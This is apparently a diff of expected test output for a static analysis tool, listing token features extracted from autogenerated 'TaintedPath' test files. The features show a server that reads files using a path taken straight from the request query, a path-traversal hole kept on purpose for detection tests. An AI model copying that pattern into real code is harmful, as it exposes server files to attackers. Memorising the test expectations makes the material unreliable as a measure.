autogenerated/TaintedPath/pupeteer.js:16:19:16:23 | close | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:0 | this | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | chownr | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | chownr | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | chownr | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | nodefs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | nodefs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | nodefs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | require | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:1:1:1 | url | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:6 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:6 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:22 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:22 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:22 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:22 | fs = require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:22 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:5:1:22 | fs = require('fs') | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:10:1:16 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:10:1:16 | require | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:10:1:22 | exceptional return of require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:10:1:22 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:10:1:22 | exceptional return of require('fs') | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:1:10:1:22 | require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:10:1:22 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:1:10:1:22 | require('fs') | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:1:18:1:21 | 'fs' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-access-paths.js:1:18:1:21 | 'fs' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:1:18:1:21 | 'fs' | calleeImports | | | autogenerated/TaintedPath/tainted-access-paths.js:1:18:1:21 | 'fs' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-access-paths.js:1:18:1:21 | 'fs' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-access-paths.js:1:18:1:21 | 'fs' | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:2:5:2:8 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:5:2:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:5:2:8 | http | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:2:5:2:26 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:5:2:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:5:2:26 | http | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:2:5:2:26 | http = ... 'http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:5:2:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:5:2:26 | http = ... 'http') | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:2:12:2:18 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:12:2:18 | require | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:2:12:2:26 | exceptional return of require('http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:12:2:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:12:2:26 | exceptional return of require('http') | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:2:12:2:26 | require('http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:12:2:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:2:12:2:26 | require('http') | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:2:20:2:25 | 'http' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-access-paths.js:2:20:2:25 | 'http' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:2:20:2:25 | 'http' | calleeImports | | | autogenerated/TaintedPath/tainted-access-paths.js:2:20:2:25 | 'http' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-access-paths.js:2:20:2:25 | 'http' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-access-paths.js:2:20:2:25 | 'http' | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:7 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:7 | url | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:24 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:24 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:24 | url | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:24 | url = require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:24 | url = require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:5:3:24 | url = require('url') | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:3:11:3:17 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:11:3:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:11:3:17 | require | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:3:11:3:24 | exceptional return of require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:11:3:24 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:11:3:24 | exceptional return of require('url') | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:3:11:3:24 | require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:11:3:24 | require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:3:11:3:24 | require('url') | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:3:19:3:23 | 'url' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-access-paths.js:3:19:3:23 | 'url' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:3:19:3:23 | 'url' | calleeImports | | | autogenerated/TaintedPath/tainted-access-paths.js:3:19:3:23 | 'url' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-access-paths.js:3:19:3:23 | 'url' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-access-paths.js:3:19:3:23 | 'url' | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:5:5:10 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:5:5:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:5:5:10 | server | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:5:32:2 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:5:32:2 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:5:32:2 | server | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:5:32:2 | server ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:5:32:2 | server ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:5:32:2 | server ... T OK\\n}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:5:17 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:5:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:5:17 | http | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:5:30 | http.createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:5:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:5:30 | http.createServer | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:32:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:32:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:32:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:32:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:32:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:14:32:2 | http.cr ... T OK\\n}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:19:5:30 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:19:5:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:19:5:30 | createServer | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | this | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | this | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:5:31 | url | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | 'arguments' object of anonymous function | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | exceptional return of anonymous function | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | functio ... OT OK\\n} | calleeImports | http | @@ -10488,6 +83301,81 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | functio ... OT OK\\n} | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:5:32:32:1 | return of anonymous function | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:41:5:43 | req | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:5:46:5:48 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:5:46:5:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:5:46:5:48 | res | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:5:46:5:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:5:46:5:48 | res | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:10 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:10 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:10 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path = ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:7:6:48 | path = ... ry.path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:16 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:16 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:16 | url | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:22 | url.parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:22 | url.parse | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | exceptional return of url.par ... , true) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:37 | url.par ... , true) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:43 | url.par ... ).query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:43 | url.par ... ).query | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:18:6:22 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:18:6:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:18:6:22 | parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:18:6:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| 